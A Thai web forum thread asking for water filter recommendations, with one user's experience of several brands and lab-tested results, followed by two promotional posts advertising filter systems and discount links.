อังคาร, 26 พฤศจิกา 2013 10:23 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ที่บ้านเคยใช้หลายยี่ห้อครับ ประมาณ 5 -6 เครื่องได้ ที่บ้านมีปัญหาว่าเวลากรองแล้วแต่ยังมีกลิ่น เลยเปลี่ยนมาเรื่อยๆจนมาใช้ แอมเว กลิ่นหาย และผมได้ทำงานเกี่ยวกับอุปกรณ์การแพทย์จึงบอกพักพวกให้เอาน้ำที่กรองที่บ้านไปเข้า Lap ให้หน่อยว่าอยู่ในเกณใหน สรุปว่า เต็ม 10 ได้ประมาณ 9 ครับถือว่าใช้ได้กลิ่นก็ไม่มี อันนี้เอาาแชร์เฉยๆนะครับ ลองตัดสินใจดู 
doctor k

เข้าร่วม: 29 พฤษภาคม 2014

น้องใหม่
น้องใหม่

พฤหัส, 29 พฤษภาคม 2014 21:20 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
สวัสดีครับ จำหน่ายเครื่องกรองน้ำดื่ม น้ำใช้ ที่มีคุณภาพ 
ราคาประหยัดสั่งตรงจากโรงงานครับ มีทั้งเครื่องกรองน้ำใช้ ฺBigblue 20 นิ้ว
เครื่องกรองน้ำ 5 ขั้นตอนแบบ Reverse osmosis (RO), เครื่องกรองน้ำ 5 ขั้นตอนแบบ UV,
เครื่องกรองน้ำ 5 หรือ 4 ขั้นตอน แบบ Ultra filtration (UF) 

อยากให้ทุกท่าน ทุกครัวเรือน มีน้ำสะอาดดื่ม 
โดยที่ไม่ต้องจ่ายเงินซื้อเครื่องกรองน้ำหรือไส้กรองแพงๆ ครับ 

ผมยินดีบริการ ให้คำแนะนำ และส่งสินค้าทั่วประเทศครับ
สามารถดูรายละเอียดเพิ่มเติม หรือติดต่อโทรสอบถามได้ตลอดเวลาครับ

พิเศษ สั่งซื้อวันนี้ รับสิทธิพิเศษ 
- แถมฟรี ไส้กรอง Sediment filter(PP) 1 อัน 
- ยินดีติดตั้งให้ฟรีครับ

โทร : 096-1807813
Email : thaimessale@gmail.com
http://www.watersystemtoyou.com/
https://www.facebook.com/watersystemtoyou

ขอบคุณครับ
Doctor K

Attached File :
นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
duckylucky

เข้าร่วม: 13 ตุลา 2017

น้องใหม่
น้องใหม่

ศุกร์, 13 ตุลา 2017 23:09 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
เครื่องกรองน้ำ ยี่ห้อไหนดี

เช็คราคาคราว ๆ ที่นี่ก่อน เครื่องกรองน้ำลดราคาอยู่คับ
http://www.homeclean.com/เครื่องกรองน้ำลดราคา-ro-purifiers
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.